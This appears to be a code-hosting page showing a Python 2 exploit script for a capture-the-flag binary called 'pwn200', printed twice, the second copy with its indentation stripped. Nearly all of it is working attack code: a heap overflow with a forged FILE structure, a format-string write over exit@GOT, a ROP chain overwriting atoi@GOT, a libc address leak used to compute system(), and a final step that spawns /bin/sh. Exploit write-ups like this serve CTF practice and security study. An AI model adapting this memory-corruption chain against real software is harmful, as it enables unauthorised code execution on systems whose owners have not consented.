peternguyen93 · May 31, 2016 09:35
diff --git a/read_write_mates_round5.py b/read_write_mates_round5.py
 #!/usr/bin/python
 # Author : peternguyen

 from Pwn import *

 p = Pwn(elf='./pwn200')

 def exploit(**kargs):
 	global p # use global var
 	if kargs.has_key('p'):
 		if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
 			p = kargs['p']
 	p.connect()

 	raw_input('Debug>')

 	# 0x08048c49 : (b'83c41c5b5e5f5dc3')	add esp,0x1c; pop ebx; pop esi; pop edi; pop ebp; ret
 	fmt = '%69x%24$hhn%67x%25$hhn%24$s'
 	fake_file = p.pack(0x80808080) # fake FILE struct
 	fake_file+= fmt + 'A'*(32 - len(fmt))
 	fake_file+= '\x00'*4
 	fake_file+= 'A'*30
 	fake_file+= '\x00'*4
 	fake_file+= 'A'*30
 	fake_file+= '\x00'*4
 	fake_file+= 'A'*(0x94 - 74 - 34)
 	fake_file+= p.pack(0x804b328) # begin of struct
 	fake_file+= 'A'*8
 	fake_file+= p.pack(p.plt['printf']) # overwrite exit@got = gadget

 	pl = 'A'*32
 	pl+= p.pack(0x804B290) # poin to fake FILE struct
 	pl+= 'A'*4
 	pl+= p.pA(0,0xb9) # fake chunk size
 	pl+= fake_file
 	pl+= 'A'*12 # padding
 	pl+= p.pA(0,0x89) # fake next size
 	pl+= 'A'*0x88
 	pl+= p.pA(0,0x30)

 	exit_got = p.got['exit']

 	stage = p.pA(
 		exit_got,
 		exit_got + 1
 	)

 	stage += p.pA(
 		p.plt['scanf'], # read
 		0x08048c4e, # (b'5f5dc3')	pop edi; pop ebp; ret
 		0x08048CC3, #"%63s"
 		p.got['atoi'],
 		p.plt['atoi'], # system
 		0x41414141,
 		p.got['atoi'] + 4
 	)

 	p.read_until('Your choice :')
 	p.sendline('5' + 'A'*3 + stage)
 	p.read_until('Leave your name :')
 	p.sendline(pl)

 	p.read_until('\n')
 	leak = p.read_until('AAAA')
 	idx = leak.find('\xf7')

 	__libc_start_main = p.unpack(leak[idx - 3:idx + 1])
 	system = __libc_start_main + 0x22840

 	print '__libc_start_main():',hex(__libc_start_main)
 	print 'system()',hex(system)
 	
 	p.sendline(p.pack(system) + '/bin/sh\x00')

 	p.io()

 exploit()
	#!/usr/bin/python
	# Author : peternguyen

	from Pwn import *

	p = Pwn(elf='./pwn200')

	def exploit(**kargs):
	global p # use global var
	if kargs.has_key('p'):
	if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
	p = kargs['p']
	p.connect()

	raw_input('Debug>')

	# 0x08048c49 : (b'83c41c5b5e5f5dc3') add esp,0x1c; pop ebx; pop esi; pop edi; pop ebp; ret
	fmt = '%69x%24$hhn%67x%25$hhn%24$s'
	fake_file = p.pack(0x80808080) # fake FILE struct
	fake_file+= fmt + 'A'*(32 - len(fmt))
	fake_file+= '\x00'*4
	fake_file+= 'A'*30
	fake_file+= '\x00'*4
	fake_file+= 'A'*30
	fake_file+= '\x00'*4
	fake_file+= 'A'*(0x94 - 74 - 34)
	fake_file+= p.pack(0x804b328) # begin of struct
	fake_file+= 'A'*8
	fake_file+= p.pack(p.plt['printf']) # overwrite exit@got = gadget

	pl = 'A'*32
	pl+= p.pack(0x804B290) # poin to fake FILE struct
	pl+= 'A'*4
	pl+= p.pA(0,0xb9) # fake chunk size
	pl+= fake_file
	pl+= 'A'*12 # padding
	pl+= p.pA(0,0x89) # fake next size
	pl+= 'A'*0x88
	pl+= p.pA(0,0x30)

	exit_got = p.got['exit']

	stage = p.pA(
	exit_got,
	exit_got + 1
	)

	stage += p.pA(
	p.plt['scanf'], # read
	0x08048c4e, # (b'5f5dc3') pop edi; pop ebp; ret
	0x08048CC3, #"%63s"
	p.got['atoi'],
	p.plt['atoi'], # system
	0x41414141,
	p.got['atoi'] + 4
	)

	p.read_until('Your choice :')
	p.sendline('5' + 'A'*3 + stage)
	p.read_until('Leave your name :')
	p.sendline(pl)

	p.read_until('\n')
	leak = p.read_until('AAAA')
	idx = leak.find('\xf7')

	__libc_start_main = p.unpack(leak[idx - 3:idx + 1])
	system = __libc_start_main + 0x22840

	print '__libc_start_main():',hex(__libc_start_main)
	print 'system()',hex(system)

	p.sendline(p.pack(system) + '/bin/sh\x00')

	p.io()

	exploit()
No results found